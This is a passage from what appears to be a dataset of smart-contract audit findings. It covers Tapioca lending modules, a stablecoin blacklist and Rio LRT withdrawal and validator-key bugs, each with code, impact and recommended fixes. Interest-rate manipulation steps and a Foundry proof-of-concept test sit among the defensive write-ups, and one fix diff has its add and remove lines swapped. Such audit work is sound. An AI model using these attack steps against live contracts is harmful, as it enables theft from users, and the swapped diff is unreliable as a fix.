msg_.composeMsg, _options.from); \\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n } else {\\n //send on this chain\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount);\\n }\\n }\\n } \\n```\\n" +Not considering fees when wrapping mtOFTs leads to DoS in leverage executors,medium,"When wrapping mtOFTs in leverage executors, fees are not considered, making calls always revert because the obtained assets amount is always smaller than expected.\\nTapioca will allow tOFTs and mtOFTs to act as collateral in some of Tapioca's markets, as described by the documentation. Although regular tOFTs don't hardcode fees to 0, meta-tOFTs (mtOFTs) could incur a fee when wrapping, as shown in the following code snippet, where `_checkAndExtractFees()` is used to calculate a fee considering the wrapped _amount:\\n```\\n// mTOFT.sol\\n\\nfunction wrap(address _fromAddress, address _toAddress, uint256 _amount)\\n external\\n payable \\n whenNotPaused\\n nonReentrant\\n returns (uint256 minted)\\n {\\n // rest of code\\n \\n uint256 feeAmount = _checkAndExtractFees(_amount);\\n if (erc20 == address(0)) {\\n _wrapNative(_toAddress, _amount, feeAmount);\\n } else { \\n if (msg.value > 0) revert mTOFT_NotNative();\\n _wrap(_fromAddress, _toAddress, _amount, feeAmount);\\n }\\n\\n return _amount - feeAmount;\\n } \\n```\\n\\nWhen fees are applied, the amount of `mtOFTs` minted to the caller won't be the full `_amount`, but the `_amount - feeAmount`.\\nTapioca's leverage executors are required to wrap/unwrap assets when tOFTs are used as collateral in order to properly perform their logic. The problem is that leverage executors don't consider the fact that if collateral is an `mtOFT`, then a fee could be applied.\\nLet's consider the `BaseLeverageExecutor` ****contract (who whas the `_swapAndTransferToSender()` function, called by all leverage executors):\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData)); \\n \\n // rest of code\\n \\n // If the tokenOut is a tOFT, wrap it. Handles ETH and ERC20.\\n // If `sendBack` is true, wrap the `amountOut to` the sender. else, wrap it to this contract.\\n if (swapData.toftInfo.isTokenOutToft) { \\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } \\n```\\n\\nAs we can see in the code snippet, if the user requires to wrap the obtained swapped assets by setting `swapData.toftInfo.isTokenOutToft` to `true`, then the internal `_handleToftWrapToSender()` function will be called. This function will wrap the tOFT (or mtOFT) and send it to `msg.sender` or `address(this)`, depending on the user's `sendBack` input:\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _handleToftWrapToSender(bool sendBack, address tokenOut, uint256 amountOut) internal {\\n address toftErc20 = ITOFT(tokenOut).erc20();\\n address wrapsTo = sendBack == true ? msg.sender : address(this);\\n\\n if (toftErc20 == address(0)) {\\n // If the tOFT is for ETH, withdraw from WETH and wrap it.\\n weth.withdraw(amountOut);\\n ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n } else {\\n // If the tOFT is for an ERC20, wrap it.\\n toftErc20.safeApprove(tokenOut, amountOut);\\n ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n toftErc20.safeApprove(tokenOut, 0);\\n }\\n }\\n```\\n\\nThe problem here is that if `tokenOut` is an mtOFT, then a fee might be applied when wrapping. However, this function does not consider the `wrap()` function return value (which as shown in the first code snippet in this report, whill return the actual minted amount, which is always `_amount - feeAmount` ).\\nThis leads to a vulnerability where contracts performing this wraps will believe they have more funds than the intended, leading to a Denial of Service and making the leverage executors never work with mtOFTs.\\nLet's say a user wants to lever up by calling BBLeverage.sol's `buyCollateral()` function:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n \\n\\n // rest of code\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max); \\n \\n \\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); \\n address(asset).safeApprove(address(yieldBox), 0); \\n \\n // rest of code\\n } \\n```\\n\\nAs we can see, the contract will call `leverageExecutor.getCollateral()` in order to perform the swap. Notice how the value returned by `getCollateral()` will be stored in the amountOut variable, which will later be converted to `collateralShare` and deposited into the `yieldBox`.\\nLet's say the `leverageExecutor` in this case is the `SimpleLeverageExecutor.sol` contract. When `getCollateral()` is called, `SimpleLeverageExecutor` will directly return the value returned by the internal `_swapAndTransferToSender()` function:\\n`// `SimpleLeverageExecutor.sol`\\n\\nfunction getCollateral( \\n address assetAddress,\\n address collateralAddress,\\n uint256 assetAmountIn,\\n bytes calldata swapperData \\n ) external payable override returns (uint256 collateralAmountOut) {\\n // Should be called only by approved SGL/BB markets.\\n if (!cluster.isWhitelisted(0, msg.sender)) revert SenderNotValid();\\n return _swapAndTransferToSender(true, assetAddress, collateralAddress, assetAmountIn, swapperData);\\n } `\\nAs seen in the report, `_swapAndTransferToSender()` won't return the amount swapped and wrapped, and will instead only return the amount obtained when swapping, assuming that wraps will always mint the same amount:\\n`// BaseLeverageExecutor.sol\\n\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n \\n ...\\n \\n amountOut = swapper.swap(swapperData, amountIn, swapData.minAmountOut);\\n \\n ...\\n if (swapData.toftInfo.isTokenOutToft) { \\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } `\\nIf the tokenOut is an mtOFT, the actual obtained amount will be smaller than the `amountOut` stored due to the fees that might be applied.\\nThis makes the `yieldBox.depositAsset()` in `BBLeverage.sol` inevitably always fail due to not having enough funds to deposit into the YieldBox effectively causing a Denial of Service","Consider the fees applied when wrapping assets by following OFT's API, and store the returned value by `wrap()`. For example, `_handleToftWrapToSender()` could return an integer with the actual amount obtained after wrapping:\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _handleToftWrapToSender(bool sendBack, address tokenOut, uint256 amountOut) internal returns(uint256 _amountOut) {\\n address toftErc20 = ITOFT(tokenOut).erc20();\\n address wrapsTo = sendBack == true ? msg.sender : address(this);\\n\\n if (toftErc20 == address(0)) {\\n // If the tOFT is for ETH, withdraw from WETH and wrap it.\\n weth.withdraw(amountOut);\\n// Remove the line below\\n ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n// Add the line below\\n _amountOut = ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n } else {\\n // If the tOFT is for an ERC20, wrap it.\\n toftErc20.safeApprove(tokenOut, amountOut);\\n// Remove the line below\\n _amountOut = ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n// Add the line below\\n ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n toftErc20.safeApprove(tokenOut, 0);\\n }\\n }\\n```\\n\\nAnd this value should be the one stored in _swapAndTransferToSender()'s amountOut:\\n```\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData)); \\n \\n // rest of code\\n \\n // If the tokenOut is a tOFT, wrap it. Handles ETH and ERC20.\\n // If `sendBack` is true, wrap the `amountOut to` the sender. else, wrap it to this contract.\\n if (swapData.toftInfo.isTokenOutToft) { \\n// Remove the line below\\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n// Add the line below\\n amountOut = _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } \\n```\\n",High. The core functionality of leverage won't work if the tokens are mtOFT tokens.,"```\\n// mTOFT.sol\\n\\nfunction wrap(address _fromAddress, address _toAddress, uint256 _amount)\\n external\\n payable \\n whenNotPaused\\n nonReentrant\\n returns (uint256 minted)\\n {\\n // rest of code\\n \\n uint256 feeAmount = _checkAndExtractFees(_amount);\\n if (erc20 == address(0)) {\\n _wrapNative(_toAddress, _amount, feeAmount);\\n } else { \\n if (msg.value > 0) revert mTOFT_NotNative();\\n _wrap(_fromAddress, _toAddress, _amount, feeAmount);\\n }\\n\\n return _amount - feeAmount;\\n } \\n```\\n" +Secondary Big Bang market rates can be manipulated due to not triggering penrose.reAccrueBigBangMarkets(); when leveraging,medium,"Secondary market rates can still be manipulated via leverage executors because `penrose.reAccrueBigBangMarkets()` is never called in the leverage module.\\nThe attack described in Tapioca's C4 audit 1561 issue and also described in Spearbit's audit 5.2.16 issue is still possible utilizing the leverage modules.\\nAs a summary, these attacks described a way to manipulate interest rates. As stated in Tapioca's documentation, the interest rate for non-ETH markets is computed considering the current debt in ETH markets. Rate manipulation could be performed by an attacker following these steps:\\nBorrow a huge amount in the ETH market. This step did not accrue the other markets.\\nAccrue other non-ETH markets. It is important to be aware of the fact that non-ETH markets base their interest calculations considering the total debt in the ETH market. After step 1, the attacker triggers an accrual on non-ETH markets which will fetch the data from the greatly increased borrow amount in the ETH market, making the non-ETH market see a huge amount of debt, thus affecting and manipulating the computation of its interest rate.\\nThe fix introduced in the C4 and Spearbit audits incorporated a new function in the Penrose contract to mitigate this issue. If the caller is the `bigBangEthMarket`, then the internal `_reAccrueMarkets()` function will be called, and market's interest rates will be accrued prior to performing any kind of borrow. Following this fix, an attacker can no longer perform step 2 of accruing the markets with a manipulated rate because accrual on secondary markets has already been triggered.\\n```\\n// Penrose.sol\\n\\nfunction reAccrueBigBangMarkets() external notPaused {\\n if (msg.sender == bigBangEthMarket) {\\n _reAccrueMarkets(false);\\n } \\n }\\n \\n function _reAccrueMarkets(bool includeMainMarket) private {\\n uint256 len = allBigBangMarkets.length;\\n address[] memory markets = allBigBangMarkets;\\n for (uint256 i; i < len; i++) {\\n address market = markets[i];\\n if (isMarketRegistered[market]) {\\n if (includeMainMarket || market != bigBangEthMarket) {\\n IBigBang(market).accrue();\\n }\\n }\\n }\\n\\n emit ReaccruedMarkets(includeMainMarket);\\n }\\n```\\n\\nAlthough this fix is effective, the attack is still possible via Big Bang's leverage modules. Leveraging is a different way of borrowing that still affects a market's total debt. As we can see, the `buyCollateral()` function still performs a `_borrow()`, thus incrementing a market's debt:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n {\\n (, uint256 borrowShare) = _borrow( \\n calldata_.from, \\n address(this), \\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n ); \\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n \\n // rest of code\\n }\\n```\\n\\nBecause Penrose's `reAccrueBigBangMarkets()` function is not called when leveraging, the attack described in the C4 and Spearbit audits is still possible by utilizing leverage to increase the ETH market's total debt, and then accruing non-ETH markets so that rates are manipulated.","It is recommended to trigger Penrose's reAccrueBigBangMarkets() function when interacting with Big Bang's leverage modules, so that the issue can be fully mitigated.","Medium. A previously found issue is still present in the codebase which allows secondary Big Bang markets interest rates to be manipulated, allowing the attacker to perform profitable strategies and potentially affecting users.",```\\n// Penrose.sol\\n\\nfunction reAccrueBigBangMarkets() external notPaused {\\n if (msg.sender == bigBangEthMarket) {\\n _reAccrueMarkets(false);\\n } \\n }\\n \\n function _reAccrueMarkets(bool includeMainMarket) private {\\n uint256 len = allBigBangMarkets.length;\\n address[] memory markets = allBigBangMarkets;\\n for (uint256 i; i < len; i++) {\\n address market = markets[i];\\n if (isMarketRegistered[market]) {\\n if (includeMainMarket || market != bigBangEthMarket) {\\n IBigBang(market).accrue();\\n }\\n }\\n }\\n\\n emit ReaccruedMarkets(includeMainMarket);\\n }\\n```\\n +`TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken,medium,"The `TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken and will revert when the Magnetar contract tries to transfer the ERC1155 tokens to the Market contract.\\n`TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken.\\nLet's examine it more closely:\\nAfter checking the whitelisting status for the `marketHelper`, `magnetar` and the `market` contracts an approval is made to the Magnetar contract.\\n`MagnetarCollateralModule::depositAddCollateralAndBorrowFromMarket` get called with the passed parameters.\\nIf the `data.deposit` is true, the Magnetar contract will call `_extractTokens` with the following params: `from = msg_.user`, `token = collateralAddress` and `amount = msg_.collateralAmount`.\\n```\\n function _extractTokens(address _from, address _token, uint256 _amount) internal returns (uint256) {\\n uint256 balanceBefore = IERC20(_token).balanceOf(address(this));\\n // IERC20(_token).safeTransferFrom(_from, address(this), _amount);\\n pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);\\n uint256 balanceAfter = IERC20(_token).balanceOf(address(this));\\n if (balanceAfter <= balanceBefore) revert Magnetar_ExtractTokenFail();\\n return balanceAfter - balanceBefore;\\n }\\n```\\n\\nThe collateral gets transferred into the Magnetar contract in case the `msg._user` has given sufficient allowance to the Magnetar contract through the Pearlmit contract.\\nAfter this `_setApprovalForYieldBox(data.market, yieldBox_);` is called that sets the allowance of the Magnetar contract to the Market contract.\\nThen `addCollateral` is called on the Market contract. I've inlined the internal function to make it easier to follow:\\n```\\n function _addCollateral(address from, address to, bool skim, uint256 amount, uint256 share) internal {\\n if (share == 0) {\\n share = yieldBox.toShare(collateralId, amount, false);\\n }\\n uint256 oldTotalCollateralShare = totalCollateralShare;\\n userCollateralShare[to] += share;\\n totalCollateralShare = oldTotalCollateralShare + share;\\n\\n // yieldBox.transfer(from, address(this), _assetId, share);\\n bool isErr = pearlmit.transferFromERC1155(from, address(this), address(yieldBox), collateralId, share);\\n if (isErr) {\\n revert TransferFailed();\\n }\\n }\\n```\\n\\nAfter the `userCollateralShare` mapping is updated `pearlmit.transferFromERC1155(from, address(this), address(yieldBox), collateralId, share);` gets called.\\nThis is critical as now the Magnetar is supposed to transfer the ERC1155 tokens(Yieldbox) to the Market contract.\\nIn order to do this the Magnetar contract should have given the allowance to the Market contract through the Pearlmit contract.\\nThis is not the case, the Magnetar has only executed `_setApprovalForYieldBox(data.market, yieldBox_);`, nothing else.\\nIt will revert inside the Pearlmit contract `transferFromERC1155` function when the allowance is being checked.\\nOther occurrences\\n`TOFT::mintLendXChainSGLXChainLockAndParticipateReceiver` has a similar issue as:\\nExtract the bbCollateral from the user, sets approval for the BigBang contract through YieldBox.\\nBut then inside the `BBCollateral::addCollateral` the `_addTokens` again expects an allowance through the Pearlmit contract.\\n`TOFT::lockAndParticipateReceiver` calls the `Magnetar:lockAndParticipate` where:\\n```\\n## MagnetarMintCommonModule.sol\\n\\nfunction _lockOnTOB(\\n IOptionsLockData memory lockData,\\n IYieldBox yieldBox_,\\n uint256 fraction,\\n bool participate,\\n address user,\\n address singularityAddress\\n ) internal returns (uint256 tOLPTokenId) {\\n // rest of code.\\n _setApprovalForYieldBox(lockData.target, yieldBox_);\\n tOLPTokenId = ITapiocaOptionLiquidityProvision(lockData.target).lock(\\n participate ? address(this) : user, singularityAddress, lockData.lockDuration, lockData.amount\\n );\\n}\\n\\n## TapiocaOptionLiquidityProvision.sol\\n\\nfunction lock(address _to, IERC20 _singularity, uint128 _lockDuration, uint128 _ybShares)\\n external\\n nonReentrant\\n returns (uint256 tokenId)\\n{\\n // Transfer the Singularity position to this contract\\n // yieldBox.transfer(msg.sender, address(this), sglAssetID, _ybShares);\\n {\\n bool isErr =\\n pearlmit.transferFromERC1155(msg.sender, address(this), address(yieldBox), sglAssetID, _ybShares);\\n if (isErr) {\\n revert TransferFailed();\\n }\\n }\\n```\\n\\nThe same issue where approval through the Pearlmit contract is expected.",Review all the allowance mechanisms and ensure that they are correct.,The `TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken and will revert when the Magnetar contract tries to transfer the ERC1155 tokens to the Market contract. There are also other instances of similar issues.,"```\\n function _extractTokens(address _from, address _token, uint256 _amount) internal returns (uint256) {\\n uint256 balanceBefore = IERC20(_token).balanceOf(address(this));\\n // IERC20(_token).safeTransferFrom(_from, address(this), _amount);\\n pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);\\n uint256 balanceAfter = IERC20(_token).balanceOf(address(this));\\n if (balanceAfter <= balanceBefore) revert Magnetar_ExtractTokenFail();\\n return balanceAfter - balanceBefore;\\n }\\n```\\n" +Blacklisted accounts can still transact.,medium,"Accounts that have been blacklisted by the `BLACKLISTER_ROLE` continue to transact normally.\\nCurrently, the only real effect of blacklisting an account is the seizure of `Stablecoin` funds:\\n```\\n/**\\n * @notice Overrides Blacklist function to transfer balance of a blacklisted user to the caller.\\n * @dev This function is called internally when an account is blacklisted.\\n * @param user The blacklisted user whose balance will be transferred.\\n */\\nfunction _onceBlacklisted(address user) internal override {\\n _transfer(user, _msgSender(), balanceOf(user));\\n}\\n```\\n\\nHowever, following a call to `addBlackList(address)`, the blacklisted account may continue to transact using `Stablecoin`.\\nCombined with previous audit reports, which attest to the blacklist function's susceptibility to frontrunning, the current implementation of the blacklist operation can effectively be considered a no-op.","ERC20s that enforce blacklists normally prevent a sanctioned address from being able to transact:\\n📄 Stablecoin.sol\\n```\\n// Add the line below\\n error Blacklisted(address account);\\n\\n// Add the line below\\nfunction _update(address from, address to, uint256 value) internal virtual override {\\n// Add the line below\\n\\n// Add the line below\\n if (blacklisted(from)) revert Blacklisted(from); \\n// Add the line below\\n if (blacklisted(to)) revert Blacklisted(to);\\n// Add the line below\\n\\n// Add the line below\\n super._update(from, to, value);\\n// Add the line below\\n}\\n```\\n","Medium, as this the failure of a manually administered security feature.","```\\n/**\\n * @notice Overrides Blacklist function to transfer balance of a blacklisted user to the caller.\\n * @dev This function is called internally when an account is blacklisted.\\n * @param user The blacklisted user whose balance will be transferred.\\n */\\nfunction _onceBlacklisted(address user) internal override {\\n _transfer(user, _msgSender(), balanceOf(user));\\n}\\n```\\n" +"Setting the strategy cap to ""0"" does not update the total shares held or the withdrawal queue",high,"Removing or setting the strategy cap to 0 will not decrease the shares held in the system. Additionally, it will not update the withdrawal queue, which means users can request withdrawals, and the withdrawals will exceed the allocated amount when rebalance occurs.\\nLet's go over the issue with an example:\\nAssume there is 1 strategy and 2 operators active in an LSR with total strategy shares holding is 1000 * 1e18 where both operators shares 500-500 the assets.\\nWhen the owner decides to inactivate or just simply sets one of the operators cap to ""0"" the operator will withdraw all its assets as follows:\\n```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n . \\n // @review this ""if"" will be executed\\n -> if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n utilizationHeap.removeByID(operatorId);\\n } else if (currentShareDetails.cap == 0 && newShareCap.cap > 0) {\\n // If the current cap is 0 and the new cap is greater than 0, insert the operator into the heap.\\n utilizationHeap.insert(OperatorUtilizationHeap.Operator(operatorId, 0));\\n } else {\\n // Otherwise, update the operator's utilization in the heap.\\n utilizationHeap.updateUtilizationByID(operatorId, currentShareDetails.allocation.divWad(newShareCap.cap));\\n }\\n .\\n }\\n```\\n\\n```\\nfunction queueOperatorStrategyExit(IRioLRTOperatorRegistry.OperatorDetails storage operator, uint8 operatorId, address strategy) internal {\\n .\\n // @review asks delegator to exit\\n -> bytes32 withdrawalRoot = delegator.queueWithdrawalForOperatorExit(strategy, sharesToExit);\\n emit IRioLRTOperatorRegistry.OperatorStrategyExitQueued(operatorId, strategy, sharesToExit, withdrawalRoot);\\n }\\n```\\n\\nThen the operator delegator contract calls the EigenLayer to withdraw all its balance as follows:\\n```\\nfunction _queueWithdrawalForOperatorExitOrScrape(address strategy, uint256 shares) internal returns (bytes32 root) {\\n . // @review jumps to internal function\\n -> root = _queueWithdrawal(strategy, shares, address(depositPool()));\\n }\\n\\nfunction _queueWithdrawal(address strategy, uint256 shares, address withdrawer) internal returns (bytes32 root) {\\n IDelegationManager.QueuedWithdrawalParams[] memory withdrawalParams = new IDelegationManager.QueuedWithdrawalParams[](1);\\n withdrawalParams[0] = IDelegationManager.QueuedWithdrawalParams({\\n strategies: strategy.toArray(),\\n shares: shares.toArray(),\\n withdrawer: withdrawer\\n });\\n // @review calls Eigen layer to queue all the balance and returns the root\\n -> root = delegationManager.queueWithdrawals(withdrawalParams)[0];\\n }\\n```\\n\\nWhich we can observe from the above snippet the EigenLayer is called for the withdrawal and then the entire function execution ends. The problem is `assetRegistry` still thinks there are 1000 * 1e18 EigenLayer shares in the operators. Also, the `withdrawalQueue` is not aware of this withdrawal request which means that users can call `requestWithdrawal` to withdraw up to 1000 * 1e18 EigenLayer shares worth LRT but in reality the 500 * 1e18 portion of it already queued in withdrawal by the owner of operator registry.\\nCoded PoC:\\n```\\nfunction test_SettingStrategyCapZero_WithdrawalsAreDoubleCountable() public {\\n IRioLRTOperatorRegistry.StrategyShareCap[] memory zeroStrategyShareCaps =\\n new IRioLRTOperatorRegistry.StrategyShareCap[](2);\\n zeroStrategyShareCaps[0] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: RETH_STRATEGY, cap: 0});\\n zeroStrategyShareCaps[1] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: CBETH_STRATEGY, cap: 0});\\n\\n uint8 operatorId = addOperatorDelegator(reLST.operatorRegistry, address(reLST.rewardDistributor));\\n\\n uint256 AMOUNT = 111e18;\\n\\n // Allocate to cbETH strategy.\\n cbETH.approve(address(reLST.coordinator), type(uint256).max);\\n uint256 lrtAmount = reLST.coordinator.deposit(CBETH_ADDRESS, AMOUNT);\\n\\n // Push funds into EigenLayer.\\n vm.prank(EOA, EOA);\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n\\n vm.recordLogs();\\n reLST.operatorRegistry.setOperatorStrategyShareCaps(operatorId, zeroStrategyShareCaps);\\n\\n Vm.Log[] memory entries = vm.getRecordedLogs();\\n assertGt(entries.length, 0);\\n\\n for (uint256 i = 0; i < entries.length; i++) {\\n if (entries[i].topics[0] == keccak256('OperatorStrategyExitQueued(uint8,address,uint256,bytes32)')) {\\n uint8 emittedOperatorId = abi.decode(abi.encodePacked(entries[i].topics[1]), (uint8));\\n (address strategy, uint256 sharesToExit, bytes32 withdrawalRoot) =\\n abi.decode(entries[i].data, (address, uint256, bytes32));\\n\\n assertEq(emittedOperatorId, operatorId);\\n assertEq(strategy, CBETH_STRATEGY);\\n assertEq(sharesToExit, AMOUNT);\\n assertNotEq(withdrawalRoot, bytes32(0));\\n\\n break;\\n }\\n if (i == entries.length - 1) fail('Event not found');\\n }\\n\\n // @review add these\\n // @review all the eigen layer shares are already queued as we checked above, now user requestWithdrawal\\n // of the same amount of EigenLayer share worth of LRT which there will be double counting when epoch is settled.\\n uint256 queuedShares = reLST.coordinator.requestWithdrawal(address(cbETH), lrtAmount);\\n console.log(""Queued shares"", queuedShares);\\n }\\n```\\n","Update the withdrawal queue when the operator registry admin changes the EigenLayer shares amount by either removing an operator or setting its strategy cap to ""0"".","High, because the users withdrawals will never go through in rebalancing because of double counting of the same share withdrawals.","```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n . \\n // @review this ""if"" will be executed\\n -> if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n utilizationHeap.removeByID(operatorId);\\n } else if (currentShareDetails.cap == 0 && newShareCap.cap > 0) {\\n // If the current cap is 0 and the new cap is greater than 0, insert the operator into the heap.\\n utilizationHeap.insert(OperatorUtilizationHeap.Operator(operatorId, 0));\\n } else {\\n // Otherwise, update the operator's utilization in the heap.\\n utilizationHeap.updateUtilizationByID(operatorId, currentShareDetails.allocation.divWad(newShareCap.cap));\\n }\\n .\\n }\\n```\\n" +"swapValidatorDetails incorrectly writes keys to memory, resulting in permanently locked beacon chain deposits",high,"When loading BLS public keys from storage to memory, the keys are partly overwritten with zero bytes. This ultimately causes allocations of these malformed public keys to permanently lock deposited ETH in the beacon chain deposit contract.\\nValidatorDetails.swapValidatorDetails is used by RioLRTOperatorRegistry.reportOutOfOrderValidatorExits to swap the details in storage of validators which have been exited out of order:\\n```\\n// Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\nVALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n```\\n\\nIn swapValidatorDetails, for each swap to occur, we load two keys into memory from storage:\\n```\\nkeyOffset1 = position.computeStorageKeyOffset(operatorId, startIndex1);\\nkeyOffset2 = position.computeStorageKeyOffset(operatorId, startIndex2);\\nassembly {\\n // Load key1 into memory\\n let _part1 := sload(keyOffset1) // Load bytes 0..31\\n let _part2 := sload(add(keyOffset1, 1)) // Load bytes 32..47\\n mstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n\\n isEmpty := iszero(or(_part1, _part2)) // Store if key1 is empty\\n\\n // Load key2 into memory\\n _part1 := sload(keyOffset2) // Load bytes 0..31\\n _part2 := sload(add(keyOffset2, 1)) // Load bytes 32..47\\n mstore(add(key2, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key2, 0x30), shr(128, _part2)) // Store bytes 16..47\\n\\n isEmpty := or(isEmpty, iszero(or(_part1, _part2))) // Store if key1 or key2 is empty\\n}\\n```\\n\\nThe problem here is that when we store the keys in memory, they don't end up as intended. Let's look at how it works to see where it goes wrong.\\nThe keys used here are BLS public keys, with a length of 48 bytes, e.g.: `0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb8af94bc3ba4d4bfa93d087d522e4b78d`. As such, previously to entering this for loop, we initialize key1 and key2 in memory as 48 byte arrays:\\n```\\nbytes memory key1 = new bytes(48);\\nbytes memory key2 = new bytes(48);\\n```\\n\\nSince they're longer than 32 bytes, they have to be stored in two separate storage slots, thus we do two sloads per key to retrieve `_part1` and `_part2`, containing the first 32 bytes and the last 16 bytes respectively.\\nThe following lines are used with the intention of storing the key in two separate memory slots, similarly to how they're stored in storage:\\n```\\nmstore(add(key1, 0x20), _part1) // Store bytes 0..31\\nmstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n```\\n\\nThe problem however is that the second mstore shifts `_part2` 128 bits to the right, causing the leftmost 128 bits to zeroed. Since this mstore is applied only 16 (0x10) bytes after the first mstore, we overwrite bytes 16..31 with zero bytes. We can test this in chisel to prove it:\\nUsing this example key: `0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb8af94bc3ba4d4bfa93d087d522e4b78d`\\nWe assign the first 32 bytes to _part1:\\n```\\nbytes32 _part1 = 0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb\\n```\\n\\nWe assign the last 16 bytes to _part2:\\n```\\nbytes32 _part2 = bytes32(bytes16(0x8af94bc3ba4d4bfa93d087d522e4b78d))\\n```\\n\\nWe assign 48 bytes in memory for key1:\\n```\\nbytes memory key1 = new bytes(48);\\n```\\n\\nAnd we run the following snippet from swapValidatorDetails in chisel:\\n```\\nassembly {\\n mstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n}\\n```\\n\\nNow we can check the resulting memory using `!memdump`, which outputs the following:\\n```\\n➜ !memdump\\n[0x00:0x20]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x20:0x40]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x40:0x60]: 0x00000000000000000000000000000000000000000000000000000000000000e0\\n[0x60:0x80]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x80:0xa0]: 0x0000000000000000000000000000000000000000000000000000000000000030\\n[0xa0:0xc0]: 0x95cfcb859956953f9834f8b14cdaa93900000000000000000000000000000000\\n[0xc0:0xe0]: 0x8af94bc3ba4d4bfa93d087d522e4b78d00000000000000000000000000000000\\n```\\n\\nWe can see from the memory that at the free memory pointer, the length of key1 is defined 48 bytes (0x30), and following it is the resulting key with 16 bytes zeroed in the middle of the key.","We can solve this by simply mstoring `_part2` prior to mstoring `_part1`, allowing the mstore of 